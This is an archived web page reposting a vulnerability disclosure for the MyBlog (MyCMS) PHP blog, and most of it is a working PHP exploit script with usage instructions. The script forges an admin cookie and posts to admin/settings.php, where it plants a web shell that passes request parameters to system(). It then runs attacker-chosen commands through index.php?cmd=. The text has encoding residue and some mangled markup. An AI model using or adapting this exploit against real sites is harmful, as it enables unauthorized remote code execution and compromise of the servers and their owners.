Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Blogs :: tb13537.htm

MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..



MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..
MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..



Hello,,=0D
=0D
MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..=0D
=0D
http://sourceforge.net/projects/myblog/=0D 
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
Exploit : -=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
echo('=0D
/**********************************************/=0D
/*          MyCmS Command Execution           */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
if ($argc<4) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host path cmd=0D
/* Example:                                   */=0D
/*    php '.$argv[0].' localhost /freewps/ id=0D
/**********************************************/=0D
');=0D
die;=0D
}=0D
=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
=0D
                          }=0D
                          else=0D
                          {=0D
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
=0D
function connect($packet)=0D
{=0D
  global $host, $port, $html;=0D
    $con=fsockopen(gethostbyname($host),$port);=0D
    if (!$con)=0D
    {=0D
      echo '[-] Error - No response from '.$host.':'.$port; die;=0D
    }=0D
  fputs($con,$packet);=0D
    $html='';=0D
    while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {=0D
      $html.=fread($con,1);=0D
    }=0D
      GLOBAL $html;=0D
  fclose($con);=0D
}=0D
=0D
$i=0;=0D
$data="";=0D
=0D
function add_data($name,$value,$type="no",$filename)=0D
{=0D
         GLOBAL $data,$i;=0D
if($type=="file")=0D
{=0D
$data.="-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";=0D
Content-Type: text/plain=0D
=0D
$value=0D
";=0D
}=0D
elseif($type=="init")=0D
{=0D
=0D
$data.="-----------------------------7d62702f250530--";=0D
=0D
}=0D
elseif($type=="clean")=0D
{=0D
$data="";=0D
}=0D
else=0D
{=0D
$data.="-----------------------------7d62702f250530=0D
Content-Disposition: form-data; name=\"$name\";=0D
Content-Type: text/plain=0D
=0D
$value=0D
";=0D
}=0D
=0D
=0D
}=0D
=0D
$host=$argv[1];=0D
$path=$argv[2];=0D
$cmd=$argv[3];=0D
$port=80;=0D
=0D
$cmd=urlencode($cmd);=0D
=0D
$p='http://'.$host.':'.$port.$path;=0D 
=0D
Echo "\n[+] Trying to Upload File";=0D
=0D
$cookie="admin=1&login=HACKERS%20PAL";=0D
$contents='WwW.SoQoR.NeT
=0D">href=\"http://www.soqor.net\">WwW.SoQoR.NeT
=0D ";=0D $cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];=0D system($cmd);=0D die();=0D ?>';=0D =0D add_data("","");=0D add_data("content",$contents);=0D add_data('','',"init");=0D =0D $packet="POST ".$p."admin/settings.php HTTP/1.0\r\n";=0D $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";=0D $packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";=0D $packet.="Accept-Language: it\r\n";=0D $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";=0D $packet.="Accept-Encoding: gzip, deflate\r\n";=0D $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";=0D $packet.="Host: ".$host."\r\n";=0D $packet.="Content-Length: ".strlen($data)."\r\n";=0D $packet.="Connection: Close\r\n";=0D $packet.="Cache-Control: no-cache\r\n";=0D $packet.="Cookie: ".$cookie."\r\n\r\n";=0D $packet.=$data;=0D connect($packet);=0D =0D =0D if (eregi("Main Blog Settings",$html))=0D {=0D echo "\n[+] Successfully uploaded ...\n[+] Go To http://".$p."index.php?cmd=$cmd for your own commands.. \n[+] The Result Of The Command\n";=0D Echo get_page($p."index.php?cmd=".$cmd);=0D }=0D else=0D {=0D echo "\n[-] Unable to Upload File\n[-] Exploit Failed";=0D }=0D echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D ?>=0D =0D #WwW.SoQoR.NeT


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH